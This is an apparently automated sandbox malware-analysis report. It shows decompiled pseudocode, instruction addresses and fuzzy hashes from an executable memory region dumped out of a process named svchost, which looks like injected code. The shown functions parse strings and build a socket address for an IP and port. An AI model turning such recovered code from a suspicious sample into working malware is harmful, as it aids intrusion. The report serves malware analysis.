                                                                                                                                                                                                                                                    0x0401ab03
                                                                                                                                                                                                                                                    0x0401ab0c
                                                                                                                                                                                                                                                    0x0401ab22
                                                                                                                                                                                                                                                    0x0401ab45
                                                                                                                                                                                                                                                    0x0401ab56
                                                                                                                                                                                                                                                    0x0401ab64
                                                                                                                                                                                                                                                    0x0401ab74
                                                                                                                                                                                                                                                    0x0401ab79
                                                                                                                                                                                                                                                    0x0401ab7f
                                                                                                                                                                                                                                                    0x0401ab86
                                                                                                                                                                                                                                                    0x0401aba1
                                                                                                                                                                                                                                                    0x0401aba8
                                                                                                                                                                                                                                                    0x0401abaa
                                                                                                                                                                                                                                                    0x0401abad
                                                                                                                                                                                                                                                    0x0401abba
                                                                                                                                                                                                                                                    0x0401abbf
                                                                                                                                                                                                                                                    0x0401abc2
                                                                                                                                                                                                                                                    0x0401abc2
                                                                                                                                                                                                                                                    0x0401abcb
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401abcb
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401a935
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401a8ef
                                                                                                                                                                                                                                                    0x0401abd1
                                                                                                                                                                                                                                                    0x0401abd5
                                                                                                                                                                                                                                                    0x0401abdd
                                                                                                                                                                                                                                                    0x0401abe0
                                                                                                                                                                                                                                                    0x0401abed
                                                                                                                                                                                                                                                    0x0401abf5
                                                                                                                                                                                                                                                    0x0401abf5
                                                                                                                                                                                                                                                    0x0401ac0c
                                                                                                                                                                                                                                                    0x0401ac0c
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset_strnlen$_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1397555153-0
                                                                                                                                                                                                                                                    • Opcode ID: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                    • Instruction ID: 9948d87256a1ab2e7e4c421ed80cf7a845357aae833f097959cef4c1dbbed60e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB17B75E012499FDB14CF90C881BEEF7B1EF48308F14C19AE8596B391D634AA86CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                    			E04012D20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                                                                                                                    				intOrPtr _t120;
                                                                                                                                                                                                                                                    				intOrPtr _t130;
                                                                                                                                                                                                                                                    				void* _t148;
                                                                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                                                                    				void* _t203;
                                                                                                                                                                                                                                                    				void* _t204;
                                                                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                                                                    				void* _t206;
                                                                                                                                                                                                                                                    				void* _t207;
                                                                                                                                                                                                                                                    				void* _t209;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t204 = __esi;
                                                                                                                                                                                                                                                    				_t203 = __edi;
                                                                                                                                                                                                                                                    				_t151 = __ebx;
                                                                                                                                                                                                                                                    				_v76 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0) {
                                                                                                                                                                                                                                                    					_t115 = E040070A0( *((intOrPtr*)(_a4 + 4)));
                                                                                                                                                                                                                                                    					_t206 = _t205 + 4;
                                                                                                                                                                                                                                                    					_v12 = _t115;
                                                                                                                                                                                                                                                    					if(_v12 >= 1) {
                                                                                                                                                                                                                                                    						_v16 = 0xffffffff;
                                                                                                                                                                                                                                                    						_v28 = 0;
                                                                                                                                                                                                                                                    						while(_v28 < _v12) {
                                                                                                                                                                                                                                                    							if( *((char*)( *((intOrPtr*)(_a4 + 4)) + _v28)) != 0x3a) {
                                                                                                                                                                                                                                                    								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v16 = _v28;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_v16 >= 0) {
                                                                                                                                                                                                                                                    							_v20 = 0;
                                                                                                                                                                                                                                                    							_t29 =  *((intOrPtr*)(_a4 + 4)) + 1; // 0x1
                                                                                                                                                                                                                                                    							_t120 = E0401EBC0(_t151, _t203, _t204, _v16 + _t29, _v12 - _v16 + 1, 0x426f4c,  &_v20);
                                                                                                                                                                                                                                                    							_t205 = _t206 + 0x10;
                                                                                                                                                                                                                                                    							_v24 = _t120;
                                                                                                                                                                                                                                                    							if(_v24 > 0 && _v20 != 0) {
                                                                                                                                                                                                                                                    								E040228B0(_t151, _t203, _t204, _v20, 4, _v24);
                                                                                                                                                                                                                                                    								_t207 = _t205 + 0xc;
                                                                                                                                                                                                                                                    								_v40 = _v24 - 1;
                                                                                                                                                                                                                                                    								_v44 = 0;
                                                                                                                                                                                                                                                    								while(_v44 < _v24) {
                                                                                                                                                                                                                                                    									_t148 = E040070A0( *((intOrPtr*)(_v20 + _v44 * 4)));
                                                                                                                                                                                                                                                    									_t207 = _t207 + 4;
                                                                                                                                                                                                                                                    									_v40 = _t148 + _v40;
                                                                                                                                                                                                                                                    									_v44 = _v44 + 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v60 = E04020CE0(_v40 + 1);
                                                                                                                                                                                                                                                    								_v32 = _v60;
                                                                                                                                                                                                                                                    								E04007010(_t203, _v32, 0, _v40 + 1);
                                                                                                                                                                                                                                                    								_t209 = _t207 + 0x10;
                                                                                                                                                                                                                                                    								_v36 = 0;
                                                                                                                                                                                                                                                    								_v48 = 0;
                                                                                                                                                                                                                                                    								while(_v48 < _v24) {
                                                                                                                                                                                                                                                    									_v52 = E040070A0( *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                    									_push(_v52);
                                                                                                                                                                                                                                                    									E04006CA0(_t151, _t203, _t204, _v32 + _v36,  *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                    									_t209 = _t209 + 0x10;
                                                                                                                                                                                                                                                    									_v36 = _v36 + _v52;
                                                                                                                                                                                                                                                    									 *((char*)(_v32 + _v36)) = 0x20;
                                                                                                                                                                                                                                                    									_v36 = _v36 + 1;
                                                                                                                                                                                                                                                    									_v48 = _v48 + 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t130 = E04020CE0(8);
                                                                                                                                                                                                                                                    								_t205 = _t209 + 4;
                                                                                                                                                                                                                                                    								_v64 = _t130;
                                                                                                                                                                                                                                                    								if(_v64 == 0) {
                                                                                                                                                                                                                                                    									_v80 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v80 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v8 = _v80;
                                                                                                                                                                                                                                                    								E0401FC90(_t151, _v8, _t203, _t204, _v32, _v40);
                                                                                                                                                                                                                                                    								_v56 = 0;
                                                                                                                                                                                                                                                    								while(_v56 < _v24) {
                                                                                                                                                                                                                                                    									if( *((intOrPtr*)(_v20 + _v56 * 4)) != 0) {
                                                                                                                                                                                                                                                    										_v68 =  *((intOrPtr*)(_v20 + _v56 * 4));
                                                                                                                                                                                                                                                    										E04020CC0(_v68);
                                                                                                                                                                                                                                                    										_t205 = _t205 + 4;
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v20 + _v56 * 4)) = 0x666;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v56 = _v56 + 1;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_v20 != 0) {
                                                                                                                                                                                                                                                    									_v72 = _v20;
                                                                                                                                                                                                                                                    									E04020CC0(_v72);
                                                                                                                                                                                                                                                    									_t205 = _t205 + 4;
                                                                                                                                                                                                                                                    									_v20 = 0x666;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if(0 != 0) {
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L35;
                                                                                                                                                                                                                                                    			}

































                                                                                                                                                                                                                                                    0x04012d20
                                                                                                                                                                                                                                                    0x04012d20
                                                                                                                                                                                                                                                    0x04012d20
                                                                                                                                                                                                                                                    0x04012d26
                                                                                                                                                                                                                                                    0x04012d29
                                                                                                                                                                                                                                                    0x04012d30
                                                                                                                                                                                                                                                    0x04012d42
                                                                                                                                                                                                                                                    0x04012d47
                                                                                                                                                                                                                                                    0x04012d4a
                                                                                                                                                                                                                                                    0x04012d51
                                                                                                                                                                                                                                                    0x04012d58
                                                                                                                                                                                                                                                    0x04012d5f
                                                                                                                                                                                                                                                    0x04012d71
                                                                                                                                                                                                                                                    0x04012d89
                                                                                                                                                                                                                                                    0x04012d6e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04012d8b
                                                                                                                                                                                                                                                    0x04012d8e
                                                                                                                                                                                                                                                    0x04012d8e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04012d89
                                                                                                                                                                                                                                                    0x04012d99
                                                                                                                                                                                                                                                    0x04012da0
                                                                                                                                                                                                                                                    0x04012dc5
                                                                                                                                                                                                                                                    0x04012dca
                                                                                                                                                                                                                                                    0x04012dcf
                                                                                                                                                                                                                                                    0x04012dd2
                                                                                                                                                                                                                                                    0x04012dd9
                                                                                                                                                                                                                                                    0x04012df3
                                                                                                                                                                                                                                                    0x04012df8
                                                                                                                                                                                                                                                    0x04012e01
                                                                                                                                                                                                                                                    0x04012e04
                                                                                                                                                                                                                                                    0x04012e16
                                                                                                                                                                                                                                                    0x04012e28
                                                                                                                                                                                                                                                    0x04012e2d
                                                                                                                                                                                                                                                    0x04012e33
                                                                                                                                                                                                                                                    0x04012e13
                                                                                                                                                                                                                                                    0x04012e13
                                                                                                                                                                                                                                                    0x04012e47
                                                                                                                                                                                                                                                    0x04012e4d
                                                                                                                                                                                                                                                    0x04012e5d
                                                                                                                                                                                                                                                    0x04012e62
                                                                                                                                                                                                                                                    0x04012e65
                                                                                                                                                                                                                                                    0x04012e6c
                                                                                                                                                                                                                                                    0x04012e7e
                                                                                                                                                                                                                                                    0x04012e98
                                                                                                                                                                                                                                                    0x04012e9e
                                                                                                                                                                                                                                                    0x04012eb0
                                                                                                                                                                                                                                                    0x04012eb5
                                                                                                                                                                                                                                                    0x04012ebe
                                                                                                                                                                                                                                                    0x04012ec7
                                                                                                                                                                                                                                                    0x04012ed0
                                                                                                                                                                                                                                                    0x04012e7b
                                                                                                                                                                                                                                                    0x04012e7b
                                                                                                                                                                                                                                                    0x04012ed7
                                                                                                                                                                                                                                                    0x04012edc
                                                                                                                                                                                                                                                    0x04012edf
                                                                                                                                                                                                                                                    0x04012ee6
                                                                                                                                                                                                                                                    0x04012ef5
                                                                                                                                                                                                                                                    0x04012ee8
                                                                                                                                                                                                                                                    0x04012ef0
                                                                                                                                                                                                                                                    0x04012ef0
                                                                                                                                                                                                                                                    0x04012eff
                                                                                                                                                                                                                                                    0x04012f0d
                                                                                                                                                                                                                                                    0x04012f12
                                                                                                                                                                                                                                                    0x04012f24
                                                                                                                                                                                                                                                    0x04012f36
                                                                                                                                                                                                                                                    0x04012f41
                                                                                                                                                                                                                                                    0x04012f48
                                                                                                                                                                                                                                                    0x04012f4d
                                                                                                                                                                                                                                                    0x04012f56
                                                                                                                                                                                                                                                    0x04012f56
                                                                                                                                                                                                                                                    0x04012f21
                                                                                                                                                                                                                                                    0x04012f21
                                                                                                                                                                                                                                                    0x04012f63
                                                                                                                                                                                                                                                    0x04012f68
                                                                                                                                                                                                                                                    0x04012f6f
                                                                                                                                                                                                                                                    0x04012f74
                                                                                                                                                                                                                                                    0x04012f77
                                                                                                                                                                                                                                                    0x04012f77
                                                                                                                                                                                                                                                    0x04012f63
                                                                                                                                                                                                                                                    0x04012f80
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04012d9b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04012d53
                                                                                                                                                                                                                                                    0x04012f86
                                                                                                                                                                                                                                                    0x04012f8c
                                                                                                                                                                                                                                                    0x04012f8c
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                                                                                                    • Opcode ID: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                    • Instruction ID: b4162b3583ba2dec2d6c765e4cdbb5ffec497666bde8b264905ccdcb2170b9d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB81D3B4E01209DBDF04CF98D984AEEB7B2BF48308F2485A9E41577390E735AA45DF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662085145-0
                                                                                                                                                                                                                                                    • Opcode ID: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                    • Instruction ID: 8ef4f0843c548fec2a10bde5c14a40ad8c72f7d7392924089e823b54c74d7b66
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E891C774A00208EFDB54DF94C894B9DBBB2FF48354F608259E9156B3A0D775EA82CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                                                                                                                                    			E040115C0(void* __ebx, unsigned int** __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                    				unsigned int* _v8;
                                                                                                                                                                                                                                                    				signed short _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                                                                    				unsigned int* _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				unsigned int* _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				unsigned int* _v88;
                                                                                                                                                                                                                                                    				unsigned int* _v92;
                                                                                                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                                                                                                    				unsigned int* _v100;
                                                                                                                                                                                                                                                    				unsigned int* _v104;
                                                                                                                                                                                                                                                    				unsigned int** _v108;
                                                                                                                                                                                                                                                    				unsigned int* _v112;
                                                                                                                                                                                                                                                    				unsigned int* _v116;
                                                                                                                                                                                                                                                    				unsigned int* _t84;
                                                                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                    				intOrPtr _t103;
                                                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                                    				signed int _t154;
                                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t153 = __esi;
                                                                                                                                                                                                                                                    				_t152 = __edi;
                                                                                                                                                                                                                                                    				_t109 = __ebx;
                                                                                                                                                                                                                                                    				_v16 =  *0x429024 ^ _t154;
                                                                                                                                                                                                                                                    				_v108 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					if(( *_v108)[1] == 0) {
                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t103 = E040070A0(( *_v108)[1]);
                                                                                                                                                                                                                                                    						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                    						_v80 = _t103;
                                                                                                                                                                                                                                                    						if(_v80 <= 0) {
                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v84 = E04020CE0(8);
                                                                                                                                                                                                                                                    							if(_v84 == 0) {
                                                                                                                                                                                                                                                    								_v112 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v112 = E0401F4E0(_v84);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v8 = _v112;
                                                                                                                                                                                                                                                    							_t149 =  *_v108;
                                                                                                                                                                                                                                                    							E0401FC90(_t109, _v8, _t152, _t153, ( *_v108)[1], _v80);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                    					_v88 = E04020CE0(0x11);
                                                                                                                                                                                                                                                    					_v68 = _v88;
                                                                                                                                                                                                                                                    					E04007010(_t152, _v68, 0, 0x11);
                                                                                                                                                                                                                                                    					 *0x4251f8(_v68, 0x10, 0x427088, ( *( *_v108) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) >> 0x00000010 & 0xff, ( *( *_v108) & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) & 0xff);
                                                                                                                                                                                                                                                    					_t84 = E04020CE0(0x401);
                                                                                                                                                                                                                                                    					_t155 = _t155 + 0x30;
                                                                                                                                                                                                                                                    					_v92 = _t84;
                                                                                                                                                                                                                                                    					_v76 = _v92;
                                                                                                                                                                                                                                                    					_v12 = 0x6987;
                                                                                                                                                                                                                                                    					_v32 = 2;
                                                                                                                                                                                                                                                    					_v28 =  *0x425258(_v68);
                                                                                                                                                                                                                                                    					_v30 =  *0x425278(_v12 & 0x0000ffff);
                                                                                                                                                                                                                                                    					_t149 =  &_v64;
                                                                                                                                                                                                                                                    					_v72 =  *0x425250( &_v32, 0x10, _v76, 0x401,  &_v64, 0x20, 8);
                                                                                                                                                                                                                                                    					if(_v72 == 0) {
                                                                                                                                                                                                                                                    						_t97 = E04020CE0(8);
                                                                                                                                                                                                                                                    						_t160 = _t155 + 4;
                                                                                                                                                                                                                                                    						_v96 = _t97;
                                                                                                                                                                                                                                                    						if(_v96 == 0) {
                                                                                                                                                                                                                                                    							_v116 = 0;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v116 = E0401F4E0(_v96);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t149 = _v116;
                                                                                                                                                                                                                                                    						_v8 = _v116;
                                                                                                                                                                                                                                                    						_t99 = E040070A0(_v76);
                                                                                                                                                                                                                                                    						_t155 = _t160 + 4;
                                                                                                                                                                                                                                                    						E0401FC90(_t109, _v8, _t152, _t153, _v76, _t99);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v76 != 0) {
                                                                                                                                                                                                                                                    						_t149 = _v76;
                                                                                                                                                                                                                                                    						_v100 = _v76;
                                                                                                                                                                                                                                                    						E04020CC0(_v100);
                                                                                                                                                                                                                                                    						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                    						_v76 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v68 != 0) {
                                                                                                                                                                                                                                                    						_v104 = _v68;
                                                                                                                                                                                                                                                    						_t149 = _v104;
                                                                                                                                                                                                                                                    						E04020CC0(_v104);
                                                                                                                                                                                                                                                    						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                    						_v68 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} while (0 != 0);
                                                                                                                                                                                                                                                    				return E04006C8C(_v8, _t109, _v16 ^ _t154, _t149, _t152, _t153);
                                                                                                                                                                                                                                                    			}

































                                                                                                                                                                                                                                                    0x040115c0
                                                                                                                                                                                                                                                    0x040115c0
                                                                                                                                                                                                                                                    0x040115c0
                                                                                                                                                                                                                                                    0x040115cd
                                                                                                                                                                                                                                                    0x040115d0
                                                                                                                                                                                                                                                    0x040115d3
                                                                                                                                                                                                                                                    0x040115da
                                                                                                                                                                                                                                                    0x040115e3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040115e5
                                                                                                                                                                                                                                                    0x040115ee
                                                                                                                                                                                                                                                    0x040115f3
                                                                                                                                                                                                                                                    0x040115f6
                                                                                                                                                                                                                                                    0x040115fd
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040115ff
                                                                                                                                                                                                                                                    0x04011609
                                                                                                                                                                                                                                                    0x04011610
                                                                                                                                                                                                                                                    0x0401161f
                                                                                                                                                                                                                                                    0x04011612
                                                                                                                                                                                                                                                    0x0401161a
                                                                                                                                                                                                                                                    0x0401161a
                                                                                                                                                                                                                                                    0x04011629
                                                                                                                                                                                                                                                    0x04011633
                                                                                                                                                                                                                                                    0x0401163c
                                                                                                                                                                                                                                                    0x0401163c
                                                                                                                                                                                                                                                    0x040115fd
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04011646
                                                                                                                                                                                                                                                    0x04011650
                                                                                                                                                                                                                                                    0x04011656
                                                                                                                                                                                                                                                    0x04011661
                                                                                                                                                                                                                                                    0x040116e5
                                                                                                                                                                                                                                                    0x040116f3
                                                                                                                                                                                                                                                    0x040116f8
                                                                                                                                                                                                                                                    0x040116fb
                                                                                                                                                                                                                                                    0x04011701
                                                                                                                                                                                                                                                    0x04011709
                                                                                                                                                                                                                                                    0x04011712
                                                                                                                                                                                                                                                    0x04011720
                                                                                                                                                                                                                                                    0x0401172e
                                                                                                                                                                                                                                                    0x04011736
                                                                                                                                                                                                                                                    0x0401174f
                                                                                                                                                                                                                                                    0x04011756
                                                                                                                                                                                                                                                    0x0401175a
                                                                                                                                                                                                                                                    0x0401175f
                                                                                                                                                                                                                                                    0x04011762
                                                                                                                                                                                                                                                    0x04011769
                                                                                                                                                                                                                                                    0x04011778
                                                                                                                                                                                                                                                    0x0401176b
                                                                                                                                                                                                                                                    0x04011773
                                                                                                                                                                                                                                                    0x04011773
                                                                                                                                                                                                                                                    0x0401177f
                                                                                                                                                                                                                                                    0x04011782
                                                                                                                                                                                                                                                    0x04011789
                                                                                                                                                                                                                                                    0x0401178e
                                                                                                                                                                                                                                                    0x04011799
                                                                                                                                                                                                                                                    0x04011799
                                                                                                                                                                                                                                                    0x040117a2
                                                                                                                                                                                                                                                    0x040117a4
                                                                                                                                                                                                                                                    0x040117a7
                                                                                                                                                                                                                                                    0x040117ae
                                                                                                                                                                                                                                                    0x040117b3
                                                                                                                                                                                                                                                    0x040117b6
                                                                                                                                                                                                                                                    0x040117b6
                                                                                                                                                                                                                                                    0x040117c1
                                                                                                                                                                                                                                                    0x040117c6
                                                                                                                                                                                                                                                    0x040117c9
                                                                                                                                                                                                                                                    0x040117cd
                                                                                                                                                                                                                                                    0x040117d2
                                                                                                                                                                                                                                                    0x040117d5
                                                                                                                                                                                                                                                    0x040117d5
                                                                                                                                                                                                                                                    0x040117dc
                                                                                                                                                                                                                                                    0x040117f4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 040115EE
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04011615
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 04011661
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401176E
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 04011789
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::__strlenstd::_$_memset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2716363198-0
                                                                                                                                                                                                                                                    • Opcode ID: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                    • Instruction ID: 26b02190921c373d841446d0dad60ddd34c3bc106182d84ff6dd49c6febfbb10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB7128B4E00318DFEB14DFA4D884BADB7B1FF48308F248128E609AB390D775A945DB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                                    			E04012470(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				intOrPtr* _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				void* _v44;
